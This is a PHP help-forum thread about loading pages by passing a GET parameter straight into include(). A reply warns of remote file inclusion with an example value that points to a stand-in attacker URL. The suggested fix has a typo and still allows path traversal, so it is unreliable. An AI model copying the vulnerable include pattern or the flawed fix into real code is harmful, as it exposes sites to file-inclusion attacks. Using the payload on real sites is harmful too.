question

[justinh]

I was wondering if you guys could tell me if this is an okay way to go about

loading different pages.

 

index.php

<?php 
isset($_GET['page']) ? $page = $_GET['page'] : $page = "main"; 
include($page.".php"); 
?>

 

And I would keep the pages in the same directory as index.php

 

[ToonMariner]

nope - someone could put page=http://theirsite.com/nasty

 

which would then allow that script access to your server.

 

you are better defining the full path to a script in any include/require staement like so

<?php
$dir = $_SEVER['DOCUMENT_ROOT'] . 'path/to/your/dir/';
isset($_GET['page']) ? $page = $_GET['page'] : $page = "main"; 
include($dir . $page.".php");
?>

 

but MANY better ways of implementing this functionality...

[justinh]

Oh your right! So in a perfect world this would be fine. But we have people that do mean things

[ToonMariner]

I like to see as people will punish you for not taking care of your code... its not their fault you build massive holes in YOUR security.

[justinh]

So you're saying you LIKE it when people find vulnerabilities in other people's code, and exploit it? I don't quit understand your reply.

[ToonMariner]

no I don't like it when security holes are exposed - I am just saying that its the developers fault and sometimes the only way they learn is when they get stung.

[justinh]

Noted sir. Thanks for your insight and helpfulness, I appreciate it.